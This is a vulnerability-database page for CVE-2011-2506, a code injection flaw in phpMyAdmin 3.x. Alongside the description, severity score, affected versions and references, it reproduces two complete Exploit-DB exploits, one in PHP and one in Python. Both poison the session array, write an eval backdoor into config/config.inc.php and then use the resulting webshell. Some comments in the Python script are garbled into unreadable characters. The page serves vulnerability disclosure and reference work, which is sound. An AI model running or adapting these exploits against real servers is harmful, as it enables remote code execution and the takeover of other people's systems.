CVE-2011-2506
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing delimiters, which allows remote attackers to conduct static code injection attacks by leveraging the ability to modify the SESSION superglobal array.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 17514
Publication date : 2011-07-08 22h00 +00:00
Author : Mango
EDB Verified : Yes
<?php /*
# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
# Date: 2011-07-09
# Author: Mango of ha.xxor.se
# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
# CVE : CVE-2011-2505, CVE-2011-2506
# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
*/
echo php_sapi_name()!=='cli'?'<pre>':'';?>
.
, )\ .
. ,/) , / ) , )\
)\( /)/( (__( /( / ) __ __ ________ __ __
/ \ ( )| |) \ / | |\ /| | | | | | | | (__)
( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____
\| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | |
| |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|
==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]==============
phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []
Remote Code Injection [] [][] [] [] [] [] [] []
http://ha.xxor.se [][] [] [] [] [][] [][] [] []
_ _ ___ __ ____ __ ___ ___
| |-| || _ |\ /\ /| _ || )
|_|-|_||_|_|/_._\/_._\|___||_|_\
___ ___ ___ _ _ ___ ___ __ __
( < | [_ / /| || || )(_)| |\ | /
>__)|_[_ \__\|____||_|_\|_| |_| |_|
Use responsibly.
<?php echo php_sapi_name()!=='cli'?'</pre>':'';
if(php_sapi_name()==='cli'){
if(!isset($argv[1])){
output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
killme();
}
$pmaurl = $argv[1];
}else{
$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token = null;
if(!function_exists('curl_init')){
output('[!] Fatal error. Need cURL!');
killme();
}
$ch = curl_init();
$debug = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))killme(true);
}
output("[i] Running...");
// Start a session and get a token
curl_setopt_array($ch, array(
CURLOPT_URL => $pmaurl.'/setup/index.php',
CURLOPT_HEADER => 1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 4,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrive session cookie and token.");
$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
killme();
}
if(!$result){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
killme();
}
// Extract cookie
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);
// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
//echo htmlspecialchars($result,ENT_QUOTES);
// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
//echo htmlspecialchars($result,ENT_QUOTES);
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
}
curl_close($ch);
function output($msg){
echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
flush();
}
function killme(){
output("[*] Exiting...");
echo php_sapi_name()!=='cli'?'<pre>':'';
die();
}
echo php_sapi_name()!=='cli'?'<pre>':'';?>
Exploit Database EDB-ID : 17510
Publication date : 2011-07-07 22h00 +00:00
Author : wofeiwo
EDB Verified : Yes
#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo<wofeiwo@80sec.com>
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################
# Requirements: 1. "config" directory must created&writeable in pma directory.
# 2. session.auto_start = 1 in php.ini configuration.
import os,sys,urllib2,re
def usage(program):
print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
execute exploit"
print "Usage: %s <PMA_url>" % program
print "Example: %s http://www.test.com/phpMyAdmin" % program
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
if args[1][-1] == "/":
args[1] = args[1][:-1]
# ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�
print "[+] Trying get form token&session_id.."
content = urllib2.urlopen(args[1]+"/index.php").read()
r1 = re.findall("token=(\w{32})", content)
r2 = re.findall("phpMyAdmin=(\w{32,40})", content)
if not r1:
r1 = re.findall("token\" value=\"(\w{32})\"", content)
if not r2:
r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
if len(r1) < 1 or len(r2) < 1:
print "[-] Cannot find form token and session id...exit."
sys.exit(-1)
token = r1[0]
sessionid = r2[0]
print "[+] Token: %s , SessionID: %s" % (token, sessionid)
# �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ
print "[+] Trying to insert payload in $_SESSION.."
uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
url = args[1]+uri
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;
pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %
(sessionid, sessionid)))
urllib2.install_opener(opener)
urllib2.urlopen(url)
# ����setup��ȡshell
print "[+] Trying get webshell.."
postdata =
"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"
% (sessionid, token)
url = args[1]+"/setup/config.php"
# print "[+]Postdata: %s" % postdata
urllib2.urlopen(url, postdata)
print "[+] All done, pray for your lucky!"
# ���IJ����������shell
url = args[1]+"/config/config.inc.php"
opener.addheaders.append(('Code', 'phpinfo();'))
urllib2.install_opener(opener)
print "[+] Trying connect shell: %s" % url
result = re.findall("System \</td\>\<td
class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
if len(result) == 1:
print "[+] Lucky u! System info: %s" % result[0]
print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
else:
print "[-] Cannot get webshell."
except Exception, e:
print e
if __name__ == "__main__" : main(sys.argv)
Products Mentioned
Configuraton 0
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
- Phpmyadmin>>Phpmyadmin >> Version 3.0.0 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.0.0 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.0.0 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.0.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
- Phpmyadmin>>Phpmyadmin >> Version 3.0.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
- Phpmyadmin>>Phpmyadmin >> Version 3.0.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.0.0
- Phpmyadmin>>Phpmyadmin >> Version 3.0.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.0.1
- Phpmyadmin>>Phpmyadmin >> Version 3.0.1 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.0.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.0.1
- Phpmyadmin>>Phpmyadmin >> Version 3.0.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.0.1.1
- Phpmyadmin>>Phpmyadmin >> Version 3.0.1.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.0
- Phpmyadmin>>Phpmyadmin >> Version 3.1.0 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.1.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.0
- Phpmyadmin>>Phpmyadmin >> Version 3.1.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.1
- Phpmyadmin>>Phpmyadmin >> Version 3.1.1 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.1.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.1
- Phpmyadmin>>Phpmyadmin >> Version 3.1.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.2
- Phpmyadmin>>Phpmyadmin >> Version 3.1.2 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.1.2 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.2
- Phpmyadmin>>Phpmyadmin >> Version 3.1.2 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.3
- Phpmyadmin>>Phpmyadmin >> Version 3.1.3 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.1.3 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.3
- Phpmyadmin>>Phpmyadmin >> Version 3.1.3 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.3.1
- Phpmyadmin>>Phpmyadmin >> Version 3.1.3.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.3.2
- Phpmyadmin>>Phpmyadmin >> Version 3.1.3.2 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.4
- Phpmyadmin>>Phpmyadmin >> Version 3.1.4 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.1.4 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.4
- Phpmyadmin>>Phpmyadmin >> Version 3.1.4 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.5
- Phpmyadmin>>Phpmyadmin >> Version 3.1.5 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.1.5 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.1.5
- Phpmyadmin>>Phpmyadmin >> Version 3.1.5 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.2.0
- Phpmyadmin>>Phpmyadmin >> Version 3.2.0 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.2.0 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.2.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.2.0
- Phpmyadmin>>Phpmyadmin >> Version 3.2.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.2.0
- Phpmyadmin>>Phpmyadmin >> Version 3.2.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.2.1
- Phpmyadmin>>Phpmyadmin >> Version 3.2.1 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.2.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.2.1
- Phpmyadmin>>Phpmyadmin >> Version 3.2.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.2.2
- Phpmyadmin>>Phpmyadmin >> Version 3.2.2 (Open CPE detail)
- Phpmyadmin>>Phpmyadmin >> Version 3.2.2 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.2.2
- Phpmyadmin>>Phpmyadmin >> Version 3.2.2 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.0.0
- Phpmyadmin>>Phpmyadmin >> Version 3.3.0.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.1.0
- Phpmyadmin>>Phpmyadmin >> Version 3.3.1.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.2.0
- Phpmyadmin>>Phpmyadmin >> Version 3.3.2.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.3.0
- Phpmyadmin>>Phpmyadmin >> Version 3.3.3.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.4.0
- Phpmyadmin>>Phpmyadmin >> Version 3.3.4.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.5.0
- Phpmyadmin>>Phpmyadmin >> Version 3.3.5.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.5.1
- Phpmyadmin>>Phpmyadmin >> Version 3.3.5.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.6
- Phpmyadmin>>Phpmyadmin >> Version 3.3.6 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.7
- Phpmyadmin>>Phpmyadmin >> Version 3.3.7 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.8
- Phpmyadmin>>Phpmyadmin >> Version 3.3.8 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.8.1
- Phpmyadmin>>Phpmyadmin >> Version 3.3.8.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.9.0
- Phpmyadmin>>Phpmyadmin >> Version 3.3.9.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.9.1
- Phpmyadmin>>Phpmyadmin >> Version 3.3.9.1 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.9.2
- Phpmyadmin>>Phpmyadmin >> Version 3.3.9.2 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.10.0
- Phpmyadmin>>Phpmyadmin >> Version 3.3.10.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.3.10.1
- Phpmyadmin>>Phpmyadmin >> Version 3.3.10.1 (Open CPE detail)
Configuraton 0
Phpmyadmin>>Phpmyadmin >> Version 3.4.0.0
- Phpmyadmin>>Phpmyadmin >> Version 3.4.0.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.4.1.0
- Phpmyadmin>>Phpmyadmin >> Version 3.4.1.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.4.2.0
- Phpmyadmin>>Phpmyadmin >> Version 3.4.2.0 (Open CPE detail)
Phpmyadmin>>Phpmyadmin >> Version 3.4.3.0
- Phpmyadmin>>Phpmyadmin >> Version 3.4.3.0 (Open CPE detail)
References
http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://www.mandriva.com/security/advisories?name=MDVSA-2011:124
Tags : vendor-advisory, x_refsource_MANDRIVA
Tags : vendor-advisory, x_refsource_MANDRIVA
http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin%3Ba=commit%3Bh=0fbedaf5fd7a771d0885c6b7385d934fc90d0d7f
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://www.securityfocus.com/archive/1/518804/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062719.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
